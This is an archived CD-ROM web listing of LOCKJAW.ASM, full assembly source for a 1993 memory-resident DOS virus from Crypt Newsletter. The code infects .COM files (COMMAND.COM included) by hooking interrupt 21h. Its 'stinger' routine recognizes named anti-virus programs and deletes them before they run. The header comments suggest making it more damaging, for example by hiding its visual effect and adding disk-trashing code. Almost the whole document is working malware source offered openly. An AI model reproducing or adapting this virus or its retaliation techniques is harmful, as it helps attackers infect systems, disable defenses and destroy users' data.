home
***
CD-ROM
|
disk
|
FTP
|
other
***
search
/
Hacker Chronicles 2
/
HACKER2.BIN
/
296.LOCKJAW.ASM
< prev
next >
Wrap
Assembly Source File
|
1993-01-28
|
18KB
|
562 lines
;LOCKJAW: a .COM-infecting resident virus with retaliatory
;anti-anti-virus capability. Programmed and contributed by Nikademus, for
;Crypt Newsletter 12, Feb. 1993.
;
;LOCKJAW is a resident virus which installs itself in
;memory using the same engine as the original Civil War/Proto-T virus.
;
;LOCKJAW hooks interrupt 21 and infects .COM files on execution, appending
;itself to the end of the "host."
;LOCKJAW will infect COMMAND.COM and is fairly transparent to a
;casual user, except when certain anti-virus programs
;(Integrity Master, McAfee's SCAN &
;CLEAN, F-PROT & VIRSTOP and Central Point Anti-virus) are loaded.
;If LOCKJAW is present and any of these programs are employed from
;a write-protected diskette, the virus will, of course, generate
;"write protect" errors.
;
;LOCKJAW's "stinger" code demonstrates the simplicity of creating a strongly
;retaliating virus by quickly deleting the anti-virus program before it
;can execute and then displaying a "chomping" graphic. Even if the anti-
;virus program cannot detect LOCKJAW in memory, it will be deleted. This
;makes it essential that the user know how to either remove the virus from
;memory before beginning anti-virus measures, or at the least run the
;anti-virus component from a write-protected disk. At a time when retail
;anti-virus packages are becoming more complicated - and more likely that the
;average user will run them from default installations on his hard file -
;LOCKJAW's retaliating power makes it a potentially very annoying pest.
;A virus-programmer serious about inconveniencing a system could do a
;number of things with this basic idea. They are;
; 1. Remove the "chomp" effect. It is entertaining, but it exposes the virus
; instantly.
; 2. Alter the_stinger routine, so that the virus immediately attacks the
; hard file. The implementation is demonstrated by LOKJAW-DREI, which
; merely makes the disk inaccessible until a warm reboot if an anti-virus
; program is employed against it. By placing
; a BONA FIDE disk-trashing routine here, it becomes very hazardous for
; an unknowing user to employ anti-virus measures on a machine where
; LOCKJAW or a LOCKJAW-like program is memory resident.
;
;These anti-anti-virus strategies are becoming more numerous in viral
;programming.
;
;For example, Mark Ludwig programmed the features of a direct-action
;retaliating virus in his "Computer Virus Developments Quarterly."
;Peach, Groove and Encroacher viruses attack anti-virus software by
;deletion of files central
;to the functionality of the software.
;
;And in this issue, the Sandra virus employs a number
;of anti-anti-virus features.
;
;The LOKJAW source listings are TASM compatible. To remove LOKJAW-ZWEI and
;DREI infected files from a system, simply delete the "companion" .COM
;duplicates of your executables. Ensure that the machine has been booted
;from a clean disk. To remove the LOCKJAW .COM-appending virus, at this
;time it will be necessary for you to restore the contaminated files from
;a clean back-up.
;
.radix 16
code segment
model small
assume cs:code, ds:code, es:code
org 100h
len equ offset last - begin
vir_len equ len / 16d
host: db 0E9h, 03h, 00h, 43h, 44h, 00h ; host dummy
begin:
call virus ; push i.p. onto the stack
virus:
jmp after_note
note:
db '[lÖçk⌡äW].ߥ.ÑîkådëMû$'
db '┼Hï$.pΓÖGΓåm.î$.à.{pΓÖ┼ö-┼].√âΓïåñ┼'
db '┼håÑk$.┼ó.ÇΓÿ₧'
after_note:
pop bp ; recalculate change in offset
sub bp,109h
fix_victim:
mov di,0100h ; restore host's
lea si,ds:[vict_head+bp] ; !
mov cx,06h ; !
rep movsb ; first 6 bytes
Is_I_runnin:
mov ax,2C2Ch
int 21h ; call to see if installed
cmp ax, 0DCDh
je Bye_Bye
cut_hole:
mov ax,cs ; get memory control block
dec ax
mov ds,ax
cmp byte ptr ds:[0000],5a ; check if last block -
jne abort
mov ax,ds:[0003]
sub ax,100 ; decrease memory
mov ds:0003,ax
Zopy_virus: ; copy to claimed block
mov bx,ax ; PSP
mov ax,es ; virus start
add ax,bx ; in memory
mov es,ax
mov cx,len ; cx = length of virus
mov ax,ds ; restore ds
inc ax
mov ds,ax
lea si,ds:[begin+bp] ; point to start of virus
lea di,es:0100 ; point to destination
rep movsb ; start copying the virus
mov [vir_seg+bp],es
mov ax,cs
mov es,ax ; restore extra segment
Grab_21:
cli
mov ax,3521h ; request address of interrupt 21
int 21h
mov ds,[vir_seg+bp]
mov ds:[old_21h-6h],bx
mov ds:[old_21h+2-6h],es
mov dx,offset Lockjaw - 6h ; revector to virus
mov ax,2521h
int 21h
sti
abort:
mov ax,cs ; get the hell outa
mov ds,ax ; Dodge
mov es,ax
xor ax,ax
Bye_Bye:
mov bx,0100h ; hand off to host
jmp bx
Lockjaw:
pushf ; is i checkin if
cmp ax,2c2ch ; resident
jne My_21h
mov ax,0dcdh
popf
iret
My_21h:
push ds
push es ; save all registers
push di
push si
push ax
push bx
push cx
push dx
check_exec:
cmp ax,04B00h ; is the file being
jne notforme ; executed?
mov cs:[name_seg-6],ds
mov cs:[name_off-6],dx
jmp chk_com ; start potential
; infection
notforme:
pop dx ; exit
pop cx ; restore all registers
pop bx
pop ax
pop si
pop di
pop es
pop ds
popf
jmp dword ptr cs:[old_21h-6]
int21:
pushf
call dword ptr cs:[old_21h-6] ; int 21h handler
jc notforme ; exit on error
ret
chk_com: cld ; this essentially copies
mov di,dx ; the name of the file
push ds ; and sets it up for
pop es ; comparison to the anti-
mov al,'.' ; virus defaults used in
repne scasb ; the_stinger
call the_stinger ; anti-virus stinger
cmp ax, 00ffh ; WAS the program an AV?
je notforme
cmp word ptr es:[di],'OC' ; is it a .com ?
jne notforme ; compare against extension
cmp word ptr es:[di+2],'M' ; masks in these two steps
jne notforme
call Grab_24 ; set critical error handler
call set_attrib
open_victim: ; open potential host
mov ds,cs:[name_seg-6]
mov dx,cs:[name_off-6]
mov ax,3D02h
call int21
jc close_file ; leave on error
push cs
pop ds
mov [handle-6],ax ; save handle
mov bx,ax
call get_date ; save date/time characters
check_forme:
push cs
pop ds
mov bx,[handle-6]
mov ah,3fh
mov cx,06h ; copy first 6 bytes of host
lea dx,[vict_head-6]
call int21
mov al, byte ptr [vict_head-6] ; is the prog a exe?
mov ah, byte ptr [vict_head-6]+1
cmp ax,[exe-6] ; compare with 'ZM'
je save_date ; jump to restore
mov al, byte ptr [vict_head-6]+3 ; is the prog already
mov ah, byte ptr [vict_head-6]+4 ; infected?
cmp ax,[initials-6]
je save_date
get_len:
mov ax,4200h
call move_pointer
mov ax,4202h
call move_pointer
sub ax,03h
mov [len_file-6],ax
call write_jmp ; write the jump to the virus
call write_virus ; at the head of the host
; write the remainder of the
save_date: ; virus to the end of the file
push cs
pop ds
mov bx,[handle-6]
mov dx,[date-6]
mov cx,[time-6]
mov ax,5701h
call int21
close_file:
mov bx,[handle-6]
mov ah,03eh
call int21
mov dx,cs:[old_24h-6]
mov ds,cs:[old_24h+2-6]
mov ax,2524h
call int21
jmp notforme
new_24h:
mov al,3
iret
the_stinger: ; detection of anti-virus against defaults
cmp word ptr es:[di-3],'MI' ;Integrity Master
je jumptoass
cmp word ptr es:[di-3],'XR' ;*rx = VIREX
je jumptoass
cmp word ptr es:[di-3],'PO' ;*STOP = VIRSTOP
jne next1
cmp word ptr es:[di-5],'TS'
je jumptoass
next1: cmp word ptr es:[di-3],'VA' ;AV = cpav
je jumptoass ;Central Point
cmp word ptr es:[di-3],'TO' ;*prot = F-prot
jne next2
cmp word ptr es:[di-5],'RP'
je jumptoass
next2: cmp word ptr es:[di-3],'NA' ;*scan = McAfee's Scan.
jne next3
cmp word ptr es:[di-5],'CS'
je jumptoass
cmp word ptr es:[di-3],'NA' ;*lean = CLEAN.
jne next3 ; why not, eh?
cmp word ptr es:[di-5],'EL'
je jumptoass
next3: ret
jumptoass:
jmp Asshole_det ;Asshole Program
;Detected, delete
move_pointer:
push cs
pop ds
mov bx,[handle-6]
xor cx,cx
xor dx,dx
call int21
ret
write_jmp:
push cs
pop ds
mov ax,4200h ; move pointer to beginning of host
call move_pointer ; do it, as in move_pointer
mov ah,40h ; write
mov cx,01h ; a byte
lea dx,[jump-6] ; of the jump to LOCKJAW code
call int21 ; out to the host
mov ah,40h ; reset the pointer
mov cx,02h
lea dx,[len_file-6]
call int21
mov ah,40h ; write the virus's recognition
mov cx,02h ; intials out to the host
lea dx,[initials-6]
call int21
ret
write_virus:
push cs
pop ds
mov ax,4202h
call move_pointer ; move the pointer to end of host
mov ah,40 ; write-to-file function
mov cx,len ; length of virus in cx
mov dx,100
call int21
ret
get_date:
mov ax,5700h ; get date/time stamps oh host
call int21 ; stash them in buffers
push cs
pop ds
mov [date-6],dx ;<-----
mov [time-6],cx ;<-----
ret
Grab_24:
mov ax,3524h ; set up critical error handler
call int21
mov cs:[old_24h-6],bx
mov cs:[old_24h+2-6],es
mov dx,offset new_24h-6
push cs
pop ds
mov ax,2524h ; revector error handler to virus
call int21
ret
set_attrib:
mov ax,4300h ; retrieve file attributes
mov ds,cs:[name_seg-6]
mov dx,cs:[name_off-6]
call int21
and cl,0feh
mov ax,4301h
call int21
ret
Asshole_det:
mov ds,cs:[name_seg-6] ; the anti-virus file
mov dx,cs:[name_off-6]
mov ax, 4301h ; clear attributes
mov cx, 00h
call int21
mov ah, 41h ; delete it
call int21
chomp:
push cs ; da chomper visual
pop ds
mov ah, 03h
int 10h
mov [c1-6], bh ; save cursor
mov [c2-6], dh
mov [c3-6], dl
mov [c4-6], ch
mov [c5-6], cl
mov ah, 1
mov cl, 0
mov ch, 40h
int 10h
mov cl, 0
mov dl, 4Fh
mov ah, 6
mov al, 0
mov bh, 0Fh
mov ch, 0
mov cl, 0
mov dh, 0
mov dl, 4Fh
int 10h
mov ah, 2
mov dh, 0
mov dl, 1Fh
mov bh, 0
int 10h
mov dx, offset eyes - 6 ; print the eyes
mov ah, 9
mov bl, 0Fh
call int21
mov ah, 2
mov dh, 1
mov dl, 0
int 10h
mov ah, 9
mov al, 0DCh
mov bl, 0Fh
mov cx, 50h
int 10h
mov ah, 2
mov dh, 18h
mov dl, 0
int 10h
mov ah, 9
mov al, 0DFh
mov bl, 0Fh
mov cx, 50h
int 10h
mov dl, 0
chomp_1:
mov ah, 2
mov dh, 2
int 10h
mov ah, 9
mov al, 55h
mov bl, 0Fh
mov cx, 1
int 10h
mov ah, 2
mov dh, 17h
inc dl
int 10h
mov ah, 9
mov al, 0EFh
mov bl, 0Fh
int 10h
inc dl
cmp dl, 50h
jl chomp_1
mov [data_1-6], 0
chomp_3:
mov cx, 7FFFh ; delays
locloop_4:
loop locloop_4
inc [data_1-6]
cmp [data_1-6], 0Ah
jl chomp_3
mov [data_1-6], 0
mov cl, 0
mov dl, 4Fh
chomp_5:
mov ah, 6
mov al, 1
mov bh, [data_2-6]
mov ch, 0Dh
mov dh, 18h
int 10h
mov ah, 7
mov al, 1
mov bh, [data_2-6]
mov ch, 0
mov dh, 0Ch
int 10h
mov cx, 3FFFh ; delays
locloop_6:
loop locloop_6
inc [data_1-6]
cmp [data_1-6], 0Bh
jl chomp_5
mov [data_1-6], 0
chomp_7:
mov cx, 7FFFh ; delays
locloop_8:
loop locloop_8
inc [data_1-6]
cmp [data_1-6], 0Ah
jl chomp_7
mov ah, 6
mov al, 0
mov bh, [data_2-6]
mov ch, 0
mov cl, 0
mov dh, 18h
mov dl, 4Fh
int 10h
mov cl, 7
mov ch, 6
int 10h
mov ah, 2
mov bh, [c1-6]
mov dh, [c2-6]
mov dl, [c3-6]
int 10h
mov al, bh
mov ah, 5
int 10h
mov ah, 1
mov ch, [c4-6]
mov cl, [c5-6]
int 10h
mov ax, 0003h
int 10h ; sort of a cls
mov ax, 00ffh
ret
eyes db '(o) (o)','$' ; ASCII eyes
vict_head db 090h, 0cdh, 020h, 043h, 044h, 00h ; 6 bytes of host
jump db 0E9h
initials dw 4443h ; I.D.
exe dw 5A4Dh ; ZM - ident for .EXE files
last db 090h
data_1 db 0
data_2 db 0
old_21h dw 00h,00h
old_24h dw 00h,00h
old_10h dw 00h,00h
name_seg dw ?
name_off dw ?
vir_seg dw ?
len_file dw ?
handle dw ?
date dw ?
time dw ?
c1 db 0
c2 db 0
c3 db 0
c4 db 0
c5 db 0
code ends
end host
